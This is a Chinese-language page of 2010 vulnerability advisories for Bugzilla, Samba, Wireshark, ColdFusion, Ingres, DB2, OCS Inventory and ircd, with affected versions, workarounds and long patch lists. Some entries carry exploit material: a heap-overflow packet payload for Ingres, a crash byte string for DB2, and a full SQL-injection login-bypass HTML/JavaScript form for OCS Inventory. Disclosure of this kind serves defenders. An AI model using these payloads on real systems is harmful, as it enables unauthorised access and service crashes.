Mozilla Bugzilla 3.5.3     Mozilla Bugzilla 3.4.5 描述：BUGTRAQ  ID: 38026 CVE ID: CVE-2009-3387 Bugzilla是很多软件项目都在使用的基于Web的BUG跟踪系统。 在将Bug从一个产品移动到另一个产品中时，会显示一个中间页面让用户选择Bug在新产品中应限制到的组，但在3.4.x版本系列中的一个功能倒退导致忽略了所有的组。作为临时解决方案，用户必须分两步首先将Bug移动至新产品中然后再限制到期望的组中。在这两步之间的时间窗口中Bug是临时公开可见的。 <*来源：Frédéric Buclin （LpSolit@gmail.com）     链接：http://secunia.com/advisories/38443/         http://marc.info/?l=bugtraq&m=126506817100388&w=2         https://bugzilla.mozilla.org/show_bug.cgi?format=multiple&id=532493 *> 建议：厂商补丁： Mozilla ------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://www.bugzilla.org/download/ Bugzilla,选择,泄露,漏洞 漏洞公告 admin 未知 2010-02-04 08:48 http://www.serversteam.com/S/Vuln/vuln_670.html 受影响系统： Mozilla Bugzilla 3.5 Mozilla Bugzilla 3.4 Mozilla Bugzilla 3.2 Mozilla Bugzilla 3.0 不受影响系统： Mozilla Bugzilla 3.5.3 Mozilla Bugzilla 3.4.5 Mozilla Bugzilla 3.2.6 Mozilla Bugzilla 3.0.11 描述：BUGTRAQ ID: 38025 CVE I 受影响系统：     Mozilla Bugzilla 3.5     Mozilla Bugzilla 3.4     Mozilla Bugzilla 3.2     Mozilla Bugzilla 3.0 不受影响系统：     Mozilla Bugzilla 3.5.3     Mozilla Bugzilla 3.4.5     Mozilla Bugzilla 3.2.6     Mozilla Bugzilla 3.0.11 描述：BUGTRAQ  ID: 38025 CVE ID: CVE-2009-3989 Bugzilla是很多软件项目都在使用的基于Web的BUG跟踪系统。 Bugzilla允许Web浏览器显示CVS/、contrib/、docs/en/xml/、t/目录中的文件及old-params.txt文件的内容。默认下这些文件不包含有敏感数据，但自定义安装可能向上述目录中添加了脚本或文件，如口令或其他敏感信息。不受限制的访问这些目录就可能导致泄漏敏感信息。 <*来源：Joel Peshkin         Frédéric Buclin （LpSolit@gmail.com）     链接：http://secunia.com/advisories/38443/         https://bugzilla.mozilla.org/show_bug.cgi?format=multiple&id=314871         https://bugzilla.mozilla.org/show_bug.cgi?format=multiple&id=434801         http://marc.info/?l=bugtraq&m=126506817100388&w=2 *> 建议：厂商补丁： Mozilla ------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://www.bugzilla.org/download/ Bugzilla,目录,泄露,漏洞 漏洞公告 admin 绿盟科技 2010-02-04 08:46 http://www.serversteam.com/S/Vuln/vuln_669.html 受影响系统： Symantec Altiris Notification Server 6.0.x 不受影响系统： Symantec Altiris Notification Server 6.0 SP3 R12 描述：BUGTRAQ ID: 37953 CVE(CAN) ID: CVE-2009-3035 Symantec Altiris产品为Symantec所提供的IT生命周期管理 受影响系统：     Symantec Altiris Notification Server 6.0.x 不受影响系统：     Symantec Altiris Notification Server 6.0 SP3 R12 描述：BUGTRAQ  ID: 37953 CVE(CAN) ID: CVE-2009-3035 Symantec Altiris产品为Symantec所提供的IT生命周期管理解决方案。 Altiris产品所使用的Notification Server的Web控制台存储了管理员所输入凭据的静态加密密钥，本地用户可以读取这个凭据用户非授权访问发现信息，或在服务器上获得权限提升；此外如果系统配置为使用SQL服务器凭据进行数据库访问，这还可能导致非授权访问Notification Server数据库上的信息。 <*来源：Matthew Burnett     链接：http://secunia.com/advisories/38356/         http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2010&suid=20100128_00 *> 建议：厂商补丁： Symantec -------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： https://kb.altiris.com/article.asp?article=46763&p=1 Symantec,Altiris,Notification, 漏洞公告 admin 绿盟科技 2010-02-04 08:42 http://www.serversteam.com/S/Vuln/vuln_668.html 受影响系统： Samba Samba 3.x 描述：BUGTRAQ ID: 37992 CVE ID: CVE-2009-3297 Samba是一套实现SMB（Server Messages Block）协议、跨平台进行文件共享和打印共享服务的程序。 Samba客户端的mount.cifs工具中存在竞争 受影响系统：     Samba Samba 3.x 描述：BUGTRAQ  ID: 37992 CVE ID: CVE-2009-3297 Samba是一套实现SMB（Server Messages Block）协议、跨平台进行文件共享和打印共享服务的程序。 Samba客户端的mount.cifs工具中存在竞争条件错误，本地非特权用户可以使用符号链接替换加载点，导致加载共享后泄露敏感信息或获得权限提升。 <*来源：Ronald Volgers     链接：http://secunia.com/advisories/38286/         https://bugzilla.samba.org/show_bug.cgi?format=multiple&id=6853         https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=532940 *> 建议：厂商补丁： Samba ----- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://git.samba.org/?p=samba.git;a=commit;h=3ae5dac462c4ed0fb2cd94553583c56fce2f9d80 http://git.samba.org/?p=samba.git;a=commit;h=a065c177dfc8f968775593ba00dffafeebb2e054 http://git.samba.org/?p=samba.git;a=commit;h=a0c31ec1c8d1220a5884e40d9ba6b191a04a24d5 Samba,mount.cifs,本地,权限提升,漏洞 漏洞公告 admin 绿盟科技 2010-02-04 08:41 http://www.serversteam.com/S/Vuln/vuln_667.html 受影响系统： Wireshark Wireshark 1.2.0 - 1.2.5 Wireshark Wireshark 0.9.15 - 1.0.10 不受影响系统： Wireshark Wireshark 1.2.6 描述：BUGTRAQ ID: 37985 CVE ID: CVE-2010-0304 Wireshark之前名为Ethereal，是一款非常流行的网络协议 受影响系统：     Wireshark Wireshark 1.2.0 - 1.2.5     Wireshark Wireshark 0.9.15 - 1.0.10 不受影响系统：     Wireshark Wireshark 1.2.6 描述：BUGTRAQ  ID: 37985 CVE ID: CVE-2010-0304 Wireshark之前名为Ethereal，是一款非常流行的网络协议分析工具。 Wireshark的LWRES协议解析模块中存在栈溢出漏洞，如果用户受骗从网络抓取了恶意的报文或读取了恶意抓包文件的话，就会导致解析模块崩溃或执行任意代码。 <*来源：babi （bbbbaaaabbbbiiii@operamail.com）     链接：http://www.wireshark.org/security/wnpa-sec-2010-02.html         http://www.debian.org/security/2010/dsa-1983 *> 测试方法： 警 告 以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ http://www.exploit-db.com/download/11288 建议：临时解决方法： 如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁： * 禁用受影响的解析模块： 1 从菜单选择Analyze→Enabled Protocols...  2 清除LWRES 3 点击“保存”、“确定” 厂商补丁： Debian ------ Debian已经为此发布了一个安全公告（DSA-1983-1）以及相应补丁: DSA-1983-1：New Wireshark packages fix several vulnerabilities 链接：http://www.debian.org/security/2010/dsa-1983 补丁下载： Source archives: http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny8.dsc Size/MD5 checksum:     1502 fdea428453f7a02c0bbac530ad464d20 http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2.orig.tar.gz Size/MD5 checksum: 16935492 1834437f7c6dbed02082e7757133047d http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny8.diff.gz Size/MD5 checksum:   113938 c4b445b78e497e030976e82cafd8c42d alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny8_alpha.deb Size/MD5 checksum:   583714 668ac773a7ee3e1f55cf19a50633e204 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny8_alpha.deb Size/MD5 checksum: 12095504 96324d6c5e22c927211e26d807525402 http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny8_alpha.deb Size/MD5 checksum:   731390 ab4c693296a8238efdaf03502e71cf8d http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny8_alpha.deb Size/MD5 checksum:   126232 eff006c86f3cc66294d70013d7ceb66b amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny8_amd64.deb Size/MD5 checksum:   659468 e5f67af41661dc409e5b52f37c6e3692 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny8_amd64.deb Size/MD5 checksum:   568622 8740a23b5dd403fb9454eda39cd0a8a3 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny8_amd64.deb Size/MD5 checksum: 11867392 f18229e426b81770a941a598e0ccca11 http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny8_amd64.deb Size/MD5 checksum:   119064 aeea3094ec89c51dede1d33b2d4ccd68 arm architecture (ARM) http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny8_arm.deb Size/MD5 checksum:   614174 1576c67c9ad3a82195918e81a6f4087d http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny8_arm.deb Size/MD5 checksum:   584402 7de0a936b738a89ac0ac575bfecccc89 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny8_arm.deb Size/MD5 checksum: 10214352 c06eea281c937286360517c7f7509009 http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny8_arm.deb Size/MD5 checksum:   111076 1b5a43f81289533f541e5cc847667fed armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny8_armel.deb Size/MD5 checksum:   620254 64b1f4ed8d2eb9f0d241615b70e46f0f http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny8_armel.deb Size/MD5 checksum:   583668 43394e55529540e4bc0d37981960211f http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny8_armel.deb Size/MD5 checksum: 10218668 7f23f088bae091152e61bf141bfbcb0a http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny8_armel.deb Size/MD5 checksum:   112870 1e1aa32700aae99fbec2d3c155ee864a i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny8_i386.deb Size/MD5 checksum:   619466 c1a679a7e1d335e1e9feddf79836ed5c http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny8_i386.deb Size/MD5 checksum:   111494 b2750543efb8f395b3dc521b88cc918a http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny8_i386.deb Size/MD5 checksum: 10109718 29a40cbac678b483b9a4a66b9403ab88 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny8_i386.deb Size/MD5 checksum:   583250 59d912e3eaf394133ac6e9998601669a ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny8_ia64.deb Size/MD5 checksum:   153916 4fc862b2d124cc2dc2f0a66e9a3e93ad http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny8_ia64.deb Size/MD5 checksum:   569752 4710ceb0c9d81385cb49436dadeae671 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny8_ia64.deb Size/MD5 checksum: 13687480 ca6157b704e067ea2896a93a2585538c http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny8_ia64.deb Size/MD5 checksum:   930070 2207486fde31fd5a0ab6802db52bd818 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny8_mips.deb Size/MD5 checksum:   569824 97649ee57827bc0457d7d3109aad979f http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny8_mips.deb Size/MD5 checksum: 10428362 aa2e57c26344871a7207a9b40a24e9b4 http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny8_mips.deb Size/MD5 checksum:   113232 631809792c778d8afd0cad51fbf795e1 http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny8_mips.deb Size/MD5 checksum:   636972 37a54296214e58bb2e79ec741d554e59 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny8_mipsel.deb Size/MD5 checksum:  9729516 88aea35735f93ed40b78fb6eb034d306 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny8_mipsel.deb Size/MD5 checksum:   569836 dcd46532b9af203d7e9ee791b52a25a0 http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny8_mipsel.deb Size/MD5 checksum:   113238 23907a5ef09f4869f82c7a8436d30301 http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny8_mipsel.deb Size/MD5 checksum:   627004 866ed04fef75ed90b746a67428304f55 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny8_powerpc.deb Size/MD5 checksum:   122178 81d3c641d508b17f8fd8ce365e8c8085 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny8_powerpc.deb Size/MD5 checksum: 11232680 30510f3f026ea8b39d789dd0da02bfd6 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny8_powerpc.deb Size/MD5 checksum:   583938 a36bfd97b21516a0c848c229aeb5acb9 http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny8_powerpc.deb Size/MD5 checksum:   677326 040fc1728ce81c21889f7812c8b23117 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny8_s390.deb Size/MD5 checksum: 12488346 6bc809171c6ac41dfe9d4303dbf6aeda http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny8_s390.deb Size/MD5 checksum:   584720 c4eb7f1bbde19d287ceb4a4c48f01c32 http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny8_s390.deb Size/MD5 checksum:   122152 44fc5e4aa25b890f3981f618288e86d5 http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny8_s390.deb Size/MD5 checksum:   671070 682574782e0c22d437d30cb886a66007 补丁安装方法： 1. 手工安装补丁包：   首先，使用下面的命令来下载补丁软件：   # wget url  (url是补丁下载链接地址)   然后，使用下面的命令来安装补丁：    # dpkg -i file.deb (file是相应的补丁名) 2. 使用apt-get自动安装补丁包：    首先，使用下面的命令更新内部数据库：    # apt-get update      然后，使用下面的命令安装更新软件包：    # apt-get upgrade Wireshark --------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://www.wireshark.org/ Wireshark,LWRES,协议,溢出,漏洞 漏洞公告 admin 绿盟科技 2010-02-04 08:40 http://www.serversteam.com/S/Vuln/vuln_666.html 受影响系统： Adobe ColdFusion 9.0 描述：BUGTRAQ ID: 38007 CVE ID: CVE-2010-0185 ColdFusion是一款高效的网络应用服务器开发环境，具有很高的易用性和开发效率，基于标准的Java技术，可以与XML、Web Services和 受影响系统：     Adobe ColdFusion 9.0 描述：BUGTRAQ  ID: 38007 CVE ID: CVE-2010-0185 ColdFusion是一款高效的网络应用服务器开发环境，具有很高的易用性和开发效率，基于标准的Java技术，可以与XML、Web Services和Microsoft.NET环境相集成。 ColdFusion的Solr服务中存在信息泄露漏洞，远程攻击者可以使用特制的URL从外部机器访问Solr服务所创建的集合，从中搜索和索引信息。 <*来源：Antero Ortiz     链接：http://www.adobe.com/support/security/bulletins/apsb10-04.html         http://kb2.adobe.com/cps/807/cpsid_80719.html         http://secunia.com/advisories/38387/ *> 建议：临时解决方法： * 禁止从外部访问Solr集合： 1. 打开安装目录下的jetty.xml文件。 2. 找到以下属性： <Set name="port"><SystemProperty name="jetty.port" default="8983"/></Set> 3. 添加以下属性： <Set name="Host"><SystemProperty name="jetty.host" default="127.0.0.1"/></Set> 4. 重启Solr服务。 厂商补丁： Adobe ----- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://kb2.adobe.com/cps/807/cpsid_80719.html ColdFusion,Solr,泄露,漏洞 漏洞公告 admin 绿盟科技 2010-02-04 08:39 http://www.serversteam.com/S/Vuln/vuln_665.html 受影响系统： Ingres Corporation Ingres Database 9.3 描述：BUGTRAQ ID: 38001 Ingres是很多CA产品默认所使用的数据库后端。 未经认证的远程攻击者可以向Ingres数据库的iidbms进程发送恶意报文触发堆溢出，导 受影响系统：     Ingres Corporation Ingres Database 9.3 描述：BUGTRAQ  ID: 38001 Ingres是很多CA产品默认所使用的数据库后端。 未经认证的远程攻击者可以向Ingres数据库的iidbms进程发送恶意报文触发堆溢出，导致执行任意代码。 <*来源：Evgeny Legerov （aland@freeradius.org）     链接：http://intevydis.blogspot.com/2010/01/ingres-93-heap-overflow.html *> 测试方法： 警 告 以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ s = "\x00\x00\x00\x00" s += "\xff\xff\xff\xff" s += "\x3c\x00\x00\x00\x06\x00\x00\x00" s += "A" * 1000 建议：厂商补丁： Ingres Corporation ------------------ 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.ingres.com/index.php Ingres,数据库,iidbms,溢出,漏洞 漏洞公告 admin 绿盟科技 2010-02-04 08:38 http://www.serversteam.com/S/Vuln/vuln_664.html 受影响系统： IBM DB2 Universal Database 9.7 FixPack 1 描述：BUGTRAQ ID: 38018 CVE(CAN) ID: CVE-2010-0472 IBM DB2是一个大型的商业关系数据库系统，面向电子商务、商业资讯、内容管理、客户关系管理等应用，可 受影响系统：     IBM DB2 Universal Database 9.7 FixPack 1 描述：BUGTRAQ  ID: 38018 CVE(CAN) ID: CVE-2010-0472 IBM DB2是一个大型的商业关系数据库系统，面向电子商务、商业资讯、内容管理、客户关系管理等应用，可运行于AIX、HP-UX、Linux、 Solaris、Windows等系统。 DB2安装程序默认安装了Tivoli Monitoring，Tivoli Monitoring代理kuddb2监听于6014端口。如果远程攻击者发送了以下五个字节的话：\x00\x05\x03\x31\x41，就会导致 kuddb2崩溃。 <*来源：Evgeny Legerov （aland@freeradius.org）     链接：http://intevydis.blogspot.com/2010/01/ibm-db2-97-kuddb2-dos.html         http://secunia.com/advisories/38294/ *> 测试方法： 警 告 以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ \x00\x05\x03\x31\x41 建议：厂商补丁： IBM --- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.ers.ibm.com/ IBM,DB2,kuddb2,拒绝服务,漏洞 漏洞公告 admin 未知 2010-02-04 08:37 http://www.serversteam.com/S/Vuln/vuln_663.html 受影响系统： OCS Inventory Team OCS Inventory NG = 1.3 b3 描述：BUGTRAQ ID: 38005 OCS Inventory NG（Open Computer and Software Inventory Next Generation）是一款系统管理软件，能帮助管理员掌握计算机软件安装和配置， 受影响系统：     OCS Inventory Team OCS Inventory NG <= 1.3 b3 描述：BUGTRAQ  ID: 38005 OCS Inventory NG（Open Computer and Software Inventory Next Generation）是一款系统管理软件，能帮助管理员掌握计算机软件安装和配置，在HTTP代理和服务器之间实现低网络流量通讯。 OCS Inventory NG的header.php文件中存在SQL注入漏洞，远程攻击者可以通过提交特制的SQL查询字符串在数据库中创建或修改任意信息，或绕过认证执行非授权操作。以下是header.php中的有漏洞代码段： 102 if(isset($_POST["login"])) { 103   $req="SELECT id, accesslvl, passwd FROM operators WHERE id='".$_POST["login"]."'"; 104   $res=mysql_query($req,$_SESSION["readServer"]) or die(mysql_error()); 105 106   if($row=@mysql_fetch_object($res)) 107   { 108     // DL 25/08/2005 109     // Support new MD5 encrypted password or old clear password for login only 110     if (($row->passwd != md5( $_POST["pass"])) and 111         ($row->passwd != $_POST["pass"])) { <*来源：Nicolas DEROUET （nicolas.derouet@gmail.com）     链接：http://marc.info/?l=bugtraq&m=126479746108162&w=2 *> 测试方法： 警 告 以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ <script>   function inject()   {     document.getElementById('log').action = document.getElementById('ocsreports').value + 'index.php';     sql = "0' UNION SELECT id, accesslvl, 'a181b4673216ad247a0f78066a9646e1' FROM operators WHERE id='"     document.getElementById('login').value = sql + document.getElementById('user').value;     document.getElementById('pass').value = "inject";   } </script> <form name="log" id="log" action="" method="post">   <table border="0" width="450px">   <tr>     <td><b>OCSReports :</b></td>     <td><input type="text" id="ocsreports" size="40" value="http://127.0.0.1/ocsreports/" /></td>   </tr>   <tr>     <td><b>Login :</b></td>     <td><input type="text" id="user" size="40" value="admin" /></td>   </tr>   <tr>     <td><input type="hidden" name="login" id="login" />         <input type="hidden" name="pass"  id="pass"  /></td>     <td><input type="submit" name="subLogin" onclick="inject();"></td>   </tr>   </table> </form> 建议：厂商补丁： OCS Inventory Team ------------------ 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.ocsinventory-ng.org/ Inventory,NG,Server,login,SQL注 漏洞公告 admin 绿盟科技 2010-02-04 08:36 http://www.serversteam.com/S/Vuln/vuln_662.html 受影响系统： IRCD-Hybrid ircd-hybrid 7.2.3 ircd-ratbox ircd-ratbox 2.x 不受影响系统： ircd-ratbox ircd-ratbox 2.2.9 描述：BUGTRAQ ID: 37978 CVE ID: CVE-2009-4016 IRCD-Hybrid和ircd-ratbox都是流行的ircd服务程序。 远程攻击者 受影响系统：     IRCD-Hybrid ircd-hybrid 7.2.3     ircd-ratbox ircd-ratbox 2.x 不受影响系统：     ircd-ratbox ircd-ratbox 2.2.9 描述：BUGTRAQ  ID: 37978 CVE ID: CVE-2009-4016 IRCD-Hybrid和ircd-ratbox都是流行的ircd服务程序。 远程攻击者可以通过向IRCD-Hybrid或ircd-ratbox IRC服务器发送特制的LINKS命令命令触发整数下溢，导致服务崩溃或执行任意指令。 <*来源：David Leadbeater     链接：http://secunia.com/advisories/38210/         http://lists.ratbox.org/pipermail/ircd-ratbox/2010-January/000891.html         http://secunia.com/advisories/38382/         http://secunia.com/advisories/38381/         http://www.debian.org/security/2010/dsa-1980 *> 建议：厂商补丁： Debian ------ Debian已经为此发布了一个安全公告（DSA-1980-1）以及相应补丁: DSA-1980-1：integer underflow/denial of service 链接：http://www.debian.org/security/2010/dsa-1980 补丁下载： Source archives: http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1.dsc Size/MD5 checksum:     1139 a48d912892925013b37fb773841d6710 http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2.orig.tar.gz Size/MD5 checksum:   756749 75896381ea6330aea860b35fff3c34bb http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1.diff.gz Size/MD5 checksum:   115007 a8d23129d0675ff779e5e315f8632a6b http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1.diff.gz Size/MD5 checksum:    18289 04a221b2b8dfd0654778a6608c7cb66b http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1.dsc Size/MD5 checksum:     1230 f79125aafcc5d9fcbd09bedadd69fce7 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg.orig.tar.gz Size/MD5 checksum:   673439 0eb7d1430a997a37af03f8b2f9eed4bb Architecture independent packages: http://security.debian.org/pool/updates/main/i/ircd-hybrid/hybrid-dev_7.2.2.dfsg.2-4+lenny1_all.deb Size/MD5 checksum:    65708 85dba185f2fdd9e7b3c423ae8722cc2f alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_alpha.deb Size/MD5 checksum:   568252 35a559f24895dab0fbe71f6af3a8c0b1 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_alpha.deb Size/MD5 checksum:   929788 583d32d5afc9747d824499183d4a5761 http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_alpha.deb Size/MD5 checksum:   660008 1a2bca514133dbc27f91bca69ed2122e amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_amd64.deb Size/MD5 checksum:   937710 2867b5535578c017699418acab7565b7 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_amd64.deb Size/MD5 checksum:   542006 52ca320cdd28849bd65065c921f03623 http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_amd64.deb Size/MD5 checksum:   634416 d320f0d1b77cb08cb0caa9c9644d13aa arm architecture (ARM) http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_arm.deb Size/MD5 checksum:   589350 451a5bcf2b4b8f40e39128be3fdc479d armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_armel.deb Size/MD5 checksum:   894654 4daf0784d8865e75c378630d7cf2d870 http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_armel.deb Size/MD5 checksum:   595420 bf40953d00dbccd069b1596b6c84eadc http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_armel.deb Size/MD5 checksum:   504238 785107a5a9fa3dcd88f2a12916d47092 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_hppa.deb Size/MD5 checksum:   908902 8e1ebf2baf27a71f008eba792cdd87d7 http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_hppa.deb Size/MD5 checksum:   647938 c67f473e9b4ae77a5578359c76ff5e75 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_hppa.deb Size/MD5 checksum:   554656 00af4d733f43a8404b2e62718a4bd341 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_i386.deb Size/MD5 checksum:   591346 7a9ccd0273005c654f5e78d6ba9d29d6 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_i386.deb Size/MD5 checksum:   891002 796bbd22c352ec873c9705e560492dbe http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_i386.deb Size/MD5 checksum:   499796 24e0d7b1284b3d7c3688366e9a8c493e ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_ia64.deb Size/MD5 checksum:   783482 28568b727f452ef622cb8939618dde23 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_ia64.deb Size/MD5 checksum:   685370 17507ab3172ad5e1fd88ea05c70f68c4 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_ia64.deb Size/MD5 checksum:   906848 4561656a5c033c9b647f146a13e79322 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_mips.deb Size/MD5 checksum:   506502 854cd9c98a5eaf38e3f815fd79d20c9a http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_mips.deb Size/MD5 checksum:   918546 5307013e962c38b405db7507e251a31d http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_mips.deb Size/MD5 checksum:   601610 9fc6640bb08a3af295589b72f6667087 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_mipsel.deb Size/MD5 checksum:   912794 6024ad0383d9696c727203a0af740630 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_mipsel.deb Size/MD5 checksum:   504864 ac200b212ed5ed69095b90bba53558f3 http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_mipsel.deb Size/MD5 checksum:   599656 f32d222728582a36d1a75494d87340af powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_powerpc.deb Size/MD5 checksum:   732146 445dc7f28c92455ed3293b9b6b795020 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_powerpc.deb Size/MD5 checksum:  1001328 bca90faf524223bb06bb47774ee7d147 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_powerpc.deb Size/MD5 checksum:   639750 282ee75ee6b2e2fefcda221fb930bc6b s390 architecture (IBM S/390) 